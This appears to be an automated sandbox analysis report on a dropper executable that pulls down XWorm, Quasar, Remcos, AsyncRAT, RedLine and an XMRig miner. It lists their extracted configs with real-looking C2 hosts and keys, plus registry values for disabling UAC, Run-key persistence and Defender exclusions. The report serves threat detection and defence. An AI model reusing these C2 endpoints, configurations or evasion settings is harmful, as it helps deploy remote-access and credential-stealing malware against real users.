Resubmissions
25-01-2025 23:19
250125-3a9dlavrfq 1025-01-2025 00:39
250125-azr7dswras 1025-01-2025 00:32
250125-avsblawpdx 1025-01-2025 00:29
250125-as5h5swnfv 1004-12-2024 19:44
241204-yftswatlcj 1028-11-2024 19:40
241128-ydqnfaxqgy 1020-11-2024 16:31
241120-t1tw6azjfy 1020-11-2024 06:05
241120-gtdv5ssnes 1020-11-2024 06:00
241120-gqchxascje 1020-11-2024 05:52
241120-gk2kvaxkgn 10Analysis
-
max time kernel
831s -
max time network
845s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
25-01-2025 00:32
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe.zip
Resource
win11-20241007-en
Behavioral task
behavioral2
Sample
4363463463464363463463463.exe
Resource
win11-20241007-en
Errors
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
xworm
5.0
87.120.113.179:7000
V4yRYee7YjNUwhyu
-
Install_directory
%AppData%
-
install_file
WindowsDefender.exe
Extracted
quasar
1.4.1
Office04
0.tcp.us-cal-1.ngrok.io:15579
104.251.123.245:23600
11bbf22e-826e-486b-b024-adbd86228a9e
-
encryption_key
7A589EDBC6A581E125BF830EF0D05FC74BB75E30
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
ctfmon
-
subdirectory
SubDir
Extracted
remcos
RemoteHost
else-directors.gl.at.ply.gg:56448
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
$77-Bitdefender.exe
-
copy_folder
Bitdefender
-
delete_file
true
-
hide_file
true
-
hide_keylog_file
false
-
install_flag
true
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-Z3DS2J
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
VisualStudioServer
-
take_screenshot_option
false
-
take_screenshot_time
5
Extracted
quasar
1.4.0
Target
127.0.0.1:6070
affasdqa.ddns.net:6070
haffasdqa.duckdns.org:6070
670d21b7-71ed-4958-9ba7-a58fa54d8203
-
encryption_key
25B2622CE0635F9A273AB61B1B7D7B94220AC509
-
install_name
svhoste.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
svhoste
-
subdirectory
SubDir
Extracted
asyncrat
0.5.7B
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
127.0.0.1:8080
127.0.0.1:18274
6.tcp.eu.ngrok.io:6606
6.tcp.eu.ngrok.io:7707
6.tcp.eu.ngrok.io:8808
6.tcp.eu.ngrok.io:8080
6.tcp.eu.ngrok.io:18274
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
quasar
1.4.1
ZJEB
VIPEEK1990-25013.portmap.host:25013
ad21b115-2c1b-40cb-adba-a50736b76c21
-
encryption_key
3EBA8BC34FA983893A9B07B831E7CEB183F7492D
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows Security Service
-
subdirectory
SubDir
Extracted
redline
testx
193.203.238.86:1912
Signatures
-
Asyncrat family
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x001c00000002aaae-293.dat family_xworm behavioral2/memory/1468-298-0x00000000007E0000-0x00000000007F2000-memory.dmp family_xworm -
Quasar family
-
Quasar payload 8 IoCs
resource yara_rule behavioral2/files/0x001a00000002aabc-303.dat family_quasar behavioral2/memory/1556-308-0x0000000000B40000-0x0000000000E64000-memory.dmp family_quasar behavioral2/files/0x0002000000025d05-355.dat family_quasar behavioral2/memory/2144-360-0x00000000005F0000-0x0000000000914000-memory.dmp family_quasar behavioral2/files/0x000500000000f4d3-471.dat family_quasar behavioral2/memory/2880-476-0x0000000000BF0000-0x0000000000C74000-memory.dmp family_quasar behavioral2/files/0x001900000002ac63-1297.dat family_quasar behavioral2/memory/1856-1302-0x0000000000550000-0x0000000000874000-memory.dmp family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
resource yara_rule behavioral2/files/0x001c00000002aab6-2341.dat family_redline behavioral2/memory/2204-2346-0x0000000000150000-0x00000000001A2000-memory.dmp family_redline -
Redline family
-
Remcos family
-
UAC bypass 3 TTPs 5 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe -
Xmrig family
-
Xworm family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x001900000002ac42-1271.dat family_asyncrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ chrome_93.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe -
XMRig Miner payload 1 IoCs
resource yara_rule behavioral2/memory/4928-435-0x0000000180000000-0x0000000180820000-memory.dmp xmrig -
Adds policy Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" ApiUpdater.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run $77-Bitdefender.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" $77-Bitdefender.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run ApiUpdater.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 478 4984 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3812 powershell.exe 1492 powershell.exe 5024 powershell.exe 2908 powershell.exe 4040 powershell.exe 4788 powershell.exe 3984 powershell.exe 4632 powershell.exe 3792 powershell.exe 4984 powershell.exe 3476 powershell.exe 2560 powershell.exe 3852 powershell.exe 4188 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 45 IoCs
flow pid Process 417 2216 4363463463464363463463463.exe 417 2216 4363463463464363463463463.exe 81 2216 4363463463464363463463463.exe 90 2136 Autoupdate.exe 90 2136 Autoupdate.exe 90 2136 Autoupdate.exe 90 2136 Autoupdate.exe 90 2136 Autoupdate.exe 90 2136 Autoupdate.exe 90 2136 Autoupdate.exe 90 2136 Autoupdate.exe 90 2136 Autoupdate.exe 90 2136 Autoupdate.exe 90 2136 Autoupdate.exe 262 2136 Autoupdate.exe 262 2136 Autoupdate.exe 262 2136 Autoupdate.exe 262 2136 Autoupdate.exe 262 2136 Autoupdate.exe 262 2136 Autoupdate.exe 262 2136 Autoupdate.exe 262 2136 Autoupdate.exe 262 2136 Autoupdate.exe 262 2136 Autoupdate.exe 262 2136 Autoupdate.exe 59 2216 4363463463464363463463463.exe 415 2216 4363463463464363463463463.exe 4 2216 4363463463464363463463463.exe 4 2216 4363463463464363463463463.exe 4 2216 4363463463464363463463463.exe 4 2216 4363463463464363463463463.exe 4 2216 4363463463464363463463463.exe 4 2216 4363463463464363463463463.exe 4 2216 4363463463464363463463463.exe 4 2216 4363463463464363463463463.exe 4 2216 4363463463464363463463463.exe 4 2216 4363463463464363463463463.exe 4 2216 4363463463464363463463463.exe 408 2216 4363463463464363463463463.exe 454 2216 4363463463464363463463463.exe 476 2216 4363463463464363463463463.exe 574 2216 4363463463464363463463463.exe 86 2216 4363463463464363463463463.exe 104 2216 4363463463464363463463463.exe 474 2216 4363463463464363463463463.exe -
Drops file in Drivers directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts stub.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File created C:\Windows\system32\drivers\etc\hosts chrome_93.exe File created C:\Windows\system32\drivers\etc\hosts updater.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 2480 attrib.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 11 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 4584 msedge.exe 3988 msedge.exe 4476 msedge.exe 4164 msedge.exe 2100 chrome.exe 4308 chrome.exe 836 msedge.exe 4732 msedge.exe 3560 chrome.exe 2056 chrome.exe 4280 msedge.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion chrome_93.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion chrome_93.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe -
Clipboard Data 1 TTPs 4 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 4732 powershell.exe 2788 cmd.exe 4932 powershell.exe 860 cmd.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsDefender.lnk XClient.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsDefender.lnk XClient.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nurik.exe nurik.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk Fast%20Download.exe -
Executes dropped EXE 64 IoCs
pid Process 1072 main1.exe 2820 main1.exe 1468 XClient.exe 1556 RunTimeBroker%20(2).exe 2144 Client-built.exe 4780 WindowsDefender.exe 4572 ApiUpdater.exe 2092 Meeting-https.exe 952 $77-Bitdefender.exe 2756 WindowsDefender.exe 2136 Autoupdate.exe 4928 Taskmgr.exe 2880 svhoste.exe 1812 svhoste.exe 4416 WindowsDefender.exe 3708 downloader.exe 2348 svhoste.exe 2480 svhoste.exe 3560 yo.exe 5028 yo.exe 4636 TestExe.exe 2464 svhoste.exe 800 stealinfo.exe 1680 stealinfo.exe 1880 rar.exe 1624 WindowsDefender.exe 4568 svhoste.exe 2080 svhoste.exe 900 kali_tools.exe 3352 svhoste.exe 728 svhoste.exe 3164 WindowsDefender.exe 1564 svhoste.exe 4936 nurik.exe 3448 nurik.exe 1500 svhoste.exe 4192 svhoste.exe 1960 svhoste.exe 2456 WindowsDefender.exe 2980 svhoste.exe 4084 svhoste.exe 4948 Fast%20Download.exe 3748 svhoste.exe 4464 svhoste.exe 3860 WindowsDefender.exe 1156 svhoste.exe 2548 svhoste.exe 5004 svhoste.exe 3396 WindowsDefender.exe 4564 svhoste.exe 4500 svhoste.exe 3040 svhoste.exe 4460 svhoste.exe 4040 WindowsDefender.exe 5016 svhoste.exe 3660 svhoste.exe 2788 svhoste.exe 3420 svhoste.exe 2312 WindowsDefender.exe 980 svhoste.exe 1380 svhoste.exe 3208 chrome_93.exe 3728 stub.exe 4880 stub.exe -
Loads dropped DLL 64 IoCs
pid Process 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 2820 main1.exe 5028 yo.exe 5028 yo.exe 5028 yo.exe 5028 yo.exe 5028 yo.exe 5028 yo.exe 5028 yo.exe 5028 yo.exe 5028 yo.exe 5028 yo.exe 5028 yo.exe 5028 yo.exe 5028 yo.exe 5028 yo.exe 5028 yo.exe 5028 yo.exe 1680 stealinfo.exe 1680 stealinfo.exe 1680 stealinfo.exe 1680 stealinfo.exe 1680 stealinfo.exe 1680 stealinfo.exe 1680 stealinfo.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x002700000002ac3f-1232.dat themida behavioral2/memory/3208-1237-0x00007FF620420000-0x00007FF62133F000-memory.dmp themida behavioral2/memory/3208-1238-0x00007FF620420000-0x00007FF62133F000-memory.dmp themida behavioral2/memory/3208-1239-0x00007FF620420000-0x00007FF62133F000-memory.dmp themida behavioral2/memory/3208-1240-0x00007FF620420000-0x00007FF62133F000-memory.dmp themida behavioral2/memory/3208-1283-0x00007FF620420000-0x00007FF62133F000-memory.dmp themida behavioral2/memory/3208-1491-0x00007FF620420000-0x00007FF62133F000-memory.dmp themida behavioral2/memory/3208-1728-0x00007FF620420000-0x00007FF62133F000-memory.dmp themida behavioral2/memory/2004-1729-0x00007FF7A5AC0000-0x00007FF7A69DF000-memory.dmp themida behavioral2/memory/2004-1730-0x00007FF7A5AC0000-0x00007FF7A69DF000-memory.dmp themida behavioral2/memory/2004-1731-0x00007FF7A5AC0000-0x00007FF7A69DF000-memory.dmp themida behavioral2/memory/2004-1789-0x00007FF7A5AC0000-0x00007FF7A69DF000-memory.dmp themida -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefender = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsDefender.exe" XClient.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" ApiUpdater.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" ApiUpdater.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" $77-Bitdefender.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" $77-Bitdefender.exe -
Checks whether UAC is enabled 1 TTPs 2 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA chrome_93.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updater.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 33 IoCs
flow ioc 222 discord.com 233 discord.com 500 6.tcp.eu.ngrok.io 228 discord.com 237 discord.com 198 discord.com 201 discord.com 207 discord.com 219 discord.com 220 discord.com 221 discord.com 1 raw.githubusercontent.com 4 raw.githubusercontent.com 231 discord.com 428 6.tcp.eu.ngrok.io 191 discord.com 213 discord.com 217 discord.com 230 discord.com 417 raw.githubusercontent.com 225 discord.com 484 raw.githubusercontent.com 131 discord.com 205 discord.com 227 discord.com 229 discord.com 235 discord.com 574 raw.githubusercontent.com 138 discord.com 223 discord.com 232 discord.com 212 discord.com 238 discord.com -
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 187 api.ipify.org 422 ip-api.com 11 ip-api.com 131 ip-api.com 139 api.ipify.org -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 1008 powercfg.exe 2832 powercfg.exe 3588 powercfg.exe 4244 powercfg.exe 4392 powercfg.exe 872 powercfg.exe 4684 powercfg.exe 4748 powercfg.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe updater.exe File opened for modification C:\Windows\system32\MRT.exe chrome_93.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Enumerates processes with tasklist 1 TTPs 8 IoCs
pid Process 3436 tasklist.exe 568 tasklist.exe 2212 tasklist.exe 4988 tasklist.exe 948 tasklist.exe 2888 tasklist.exe 4524 tasklist.exe 2028 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 2140 cmd.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3208 chrome_93.exe 2004 updater.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 952 set thread context of 2456 952 $77-Bitdefender.exe 133 PID 2004 set thread context of 1044 2004 updater.exe 654 PID 2004 set thread context of 1572 2004 updater.exe 659 -
resource yara_rule behavioral2/memory/5028-531-0x00007FFDCB770000-0x00007FFDCBD58000-memory.dmp upx behavioral2/memory/5028-543-0x00007FFDEC670000-0x00007FFDEC694000-memory.dmp upx behavioral2/memory/5028-545-0x00007FFDED580000-0x00007FFDED58F000-memory.dmp upx behavioral2/memory/5028-551-0x00007FFDEC640000-0x00007FFDEC66D000-memory.dmp upx behavioral2/memory/5028-552-0x00007FFDEC620000-0x00007FFDEC639000-memory.dmp upx behavioral2/memory/5028-553-0x00007FFDEC5F0000-0x00007FFDEC613000-memory.dmp upx behavioral2/memory/5028-554-0x00007FFDCB190000-0x00007FFDCB303000-memory.dmp upx behavioral2/memory/5028-555-0x00007FFDEC5D0000-0x00007FFDEC5E9000-memory.dmp upx behavioral2/memory/5028-556-0x00007FFDED080000-0x00007FFDED08D000-memory.dmp upx behavioral2/memory/5028-558-0x00007FFDE3B20000-0x00007FFDE3BD8000-memory.dmp upx behavioral2/memory/5028-559-0x00007FFDCB770000-0x00007FFDCBD58000-memory.dmp upx behavioral2/memory/5028-557-0x00007FFDEC5A0000-0x00007FFDEC5CE000-memory.dmp upx behavioral2/memory/5028-560-0x00007FFDCAE10000-0x00007FFDCB185000-memory.dmp upx behavioral2/memory/5028-562-0x00007FFDEBBB0000-0x00007FFDEBBC4000-memory.dmp upx behavioral2/memory/5028-561-0x00007FFDEC670000-0x00007FFDEC694000-memory.dmp upx behavioral2/memory/5028-564-0x00007FFDD8180000-0x00007FFDD829C000-memory.dmp upx behavioral2/memory/5028-563-0x00007FFDEC590000-0x00007FFDEC59D000-memory.dmp upx behavioral2/memory/5028-599-0x00007FFDEC620000-0x00007FFDEC639000-memory.dmp upx behavioral2/memory/5028-651-0x00007FFDEC5F0000-0x00007FFDEC613000-memory.dmp upx behavioral2/memory/5028-674-0x00007FFDCB190000-0x00007FFDCB303000-memory.dmp upx behavioral2/memory/5028-685-0x00007FFDEC5D0000-0x00007FFDEC5E9000-memory.dmp upx behavioral2/memory/5028-688-0x00007FFDEC5A0000-0x00007FFDEC5CE000-memory.dmp upx behavioral2/memory/5028-689-0x00007FFDE3B20000-0x00007FFDE3BD8000-memory.dmp upx behavioral2/memory/5028-715-0x00007FFDCAE10000-0x00007FFDCB185000-memory.dmp upx behavioral2/memory/5028-741-0x00007FFDD8180000-0x00007FFDD829C000-memory.dmp upx behavioral2/memory/5028-727-0x00007FFDCB770000-0x00007FFDCBD58000-memory.dmp upx behavioral2/memory/5028-733-0x00007FFDCB190000-0x00007FFDCB303000-memory.dmp upx behavioral2/memory/5028-728-0x00007FFDEC670000-0x00007FFDEC694000-memory.dmp upx behavioral2/memory/5028-744-0x00007FFDCB770000-0x00007FFDCBD58000-memory.dmp upx behavioral2/memory/5028-758-0x00007FFDD8180000-0x00007FFDD829C000-memory.dmp upx behavioral2/memory/5028-757-0x00007FFDEC590000-0x00007FFDEC59D000-memory.dmp upx behavioral2/memory/5028-756-0x00007FFDEBBB0000-0x00007FFDEBBC4000-memory.dmp upx behavioral2/memory/5028-754-0x00007FFDCAE10000-0x00007FFDCB185000-memory.dmp upx behavioral2/memory/5028-753-0x00007FFDEC5A0000-0x00007FFDEC5CE000-memory.dmp upx behavioral2/memory/5028-752-0x00007FFDED080000-0x00007FFDED08D000-memory.dmp upx behavioral2/memory/5028-751-0x00007FFDEC5D0000-0x00007FFDEC5E9000-memory.dmp upx behavioral2/memory/5028-750-0x00007FFDCB190000-0x00007FFDCB303000-memory.dmp upx behavioral2/memory/5028-749-0x00007FFDEC5F0000-0x00007FFDEC613000-memory.dmp upx behavioral2/memory/5028-748-0x00007FFDEC620000-0x00007FFDEC639000-memory.dmp upx behavioral2/memory/5028-747-0x00007FFDEC640000-0x00007FFDEC66D000-memory.dmp upx behavioral2/memory/5028-746-0x00007FFDED580000-0x00007FFDED58F000-memory.dmp upx behavioral2/memory/5028-745-0x00007FFDEC670000-0x00007FFDEC694000-memory.dmp upx behavioral2/memory/5028-755-0x00007FFDE3B20000-0x00007FFDE3BD8000-memory.dmp upx behavioral2/memory/4880-1266-0x00007FFDD0690000-0x00007FFDD0CF3000-memory.dmp upx behavioral2/memory/4880-1278-0x00007FFDED580000-0x00007FFDED58F000-memory.dmp upx behavioral2/memory/4880-1277-0x00007FFDEC670000-0x00007FFDEC697000-memory.dmp upx behavioral2/memory/4880-1282-0x00007FFDE3140000-0x00007FFDE32BF000-memory.dmp upx behavioral2/memory/4880-1281-0x00007FFDEC5F0000-0x00007FFDEC615000-memory.dmp upx behavioral2/memory/4880-1280-0x00007FFDEC620000-0x00007FFDEC64B000-memory.dmp upx behavioral2/memory/4880-1279-0x00007FFDEC650000-0x00007FFDEC669000-memory.dmp upx behavioral2/memory/4880-1284-0x00007FFDEC5D0000-0x00007FFDEC5E9000-memory.dmp upx behavioral2/memory/4880-1288-0x00007FFDED080000-0x00007FFDED08D000-memory.dmp upx behavioral2/memory/4880-1289-0x00007FFDEC590000-0x00007FFDEC5C4000-memory.dmp upx behavioral2/memory/4880-1286-0x00007FFDCB820000-0x00007FFDCBD53000-memory.dmp upx behavioral2/memory/4880-1285-0x00007FFDE3B10000-0x00007FFDE3BDE000-memory.dmp upx behavioral2/memory/4880-1291-0x00007FFDEC530000-0x00007FFDEC53D000-memory.dmp upx behavioral2/memory/4880-1290-0x00007FFDEBBB0000-0x00007FFDEBBC4000-memory.dmp upx behavioral2/memory/4880-1292-0x00007FFDD0690000-0x00007FFDD0CF3000-memory.dmp upx behavioral2/memory/4880-1303-0x00007FFDE3080000-0x00007FFDE3133000-memory.dmp upx behavioral2/memory/4880-1324-0x00007FFDEC5F0000-0x00007FFDEC615000-memory.dmp upx behavioral2/memory/4880-1480-0x00007FFDE3140000-0x00007FFDE32BF000-memory.dmp upx behavioral2/memory/4880-1492-0x00007FFDE3B10000-0x00007FFDE3BDE000-memory.dmp upx behavioral2/memory/4880-1493-0x00007FFDCB820000-0x00007FFDCBD53000-memory.dmp upx behavioral2/memory/4880-1698-0x00007FFDEC590000-0x00007FFDEC5C4000-memory.dmp upx -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp chrome.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1828 sc.exe 1692 sc.exe 2140 sc.exe 1408 sc.exe 1896 sc.exe 720 sc.exe 2056 sc.exe 1388 sc.exe 4596 sc.exe 2700 sc.exe 1228 sc.exe 4444 sc.exe 3716 sc.exe 2492 sc.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 4800 mshta.exe -
Detects Pyinstaller 4 IoCs
resource yara_rule behavioral2/files/0x001d00000002aa83-8.dat pyinstaller behavioral2/files/0x0002000000025cd6-602.dat pyinstaller behavioral2/files/0x0009000000025bd3-796.dat pyinstaller behavioral2/files/0x001900000002ac41-1245.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 22 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language $77-Bitdefender.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aaa%20(3).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VB.NET%20CRYPTER%20V2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PORNHU~1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kali_tools.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ApiUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language downloader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TestExe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fast%20Download.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ewm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language retest.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pornhub_downloader.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 57 IoCs
Adversaries may check for Internet connectivity on compromised systems.
